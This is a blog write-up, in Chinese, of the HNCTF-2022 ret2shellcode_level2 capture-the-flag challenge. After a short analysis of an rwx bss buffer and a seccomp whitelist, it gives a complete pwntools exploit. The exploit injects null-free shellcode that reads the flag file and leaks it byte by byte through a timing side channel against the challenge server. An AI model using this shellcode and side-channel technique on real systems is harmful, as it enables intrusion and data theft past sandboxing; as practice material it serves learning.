NSSCTF-HNCTF-2022-ret2shellcode_level2 题解

Fri, 06 Feb 2026 20:18:00 +0000

题目

题目链接

checksec

IDA

bss 段为 rwx ， buff 在 bss 段上，但是注意 strcpy 会被 \x00 截断，因此写入的 shellcode 不能有 \x00

白名单沙箱：仅允许 open 、 read 、 mmap 系统调用

没有 write ，因此考虑侧信道爆破，再加一点小巧思避免 \x00 出现即可

exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92


from pwn import *

context.log_level = 'info'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

debug = 0

def conn():
	if debug:
		return process('./ret2shellcode_level2')
	else:
		return remote('node5.anna.nssctf.cn', 28199)

rwx_base = 0x404060
again_addr = 0x40132B

def scgen(idx, char):
	sth = f'mov cl, 0x{idx:x}'
	sc = asm(f'''
		xor rdi, rdi
		xor rsi, rsi
		xor rdx, rdx
		 
		xor rax, rax
		add al, 0x67
		shl rax, 8
		add al, 0x61
		shl rax, 8
		add al, 0x6c
		shl rax, 8
		add al, 0x66
		shl rax, 8
		add al, 0x2f
		push rax
		push rsp
		pop rdi
		xor rax, rax
		add al, 2
		syscall

		xor rdi, rdi
		add dil, 3
		push rsp
		pop rsi
		xor rdx, rdx
		add dl, 0x7f
		xor rax, rax
		syscall

		xor rcx, rcx
		{'' if idx == 0 else sth}
		mov al, [rsp + rcx]
		cmp al, 0x{char:x}
		LOOP:
		je LOOP
	''')
	return sc

def test(idx, char):
	io = conn()
	sc = scgen(idx, char).ljust(0x100, b'\x00')
	payload = sc + p64(rwx_base + 0x400) + p64(rwx_base)
	io.sendline(payload)
	start_time = time.time()
	io.recvall(timeout = 2)
	end_time = time.time()
	io.close()
	return end_time - start_time

def attack():
	flag = ''
	idx = len(flag)
	while True:
		for char in range(32, 127):
			try:
				if test(idx, char) > 1.7:
					print(f'Found char at {idx}: {chr(char)} | Current Flag: {flag}')
					flag += chr(char)
					if chr(char) == '}':
						return flag
					break
				else:
					print(f'Test char failed at {idx}: {chr(char)} | Current Flag: {flag}')
			except Exception as e:
				char -= 1
				print(f'Error:{e}')
				continue
		idx += 1
	return flag

print(f"Flag: {attack()}")

侧信道爆破 on RatherHard の Blog

NSSCTF-HNCTF-2022-ret2shellcode_level2 题解

题目

checksec

IDA

exp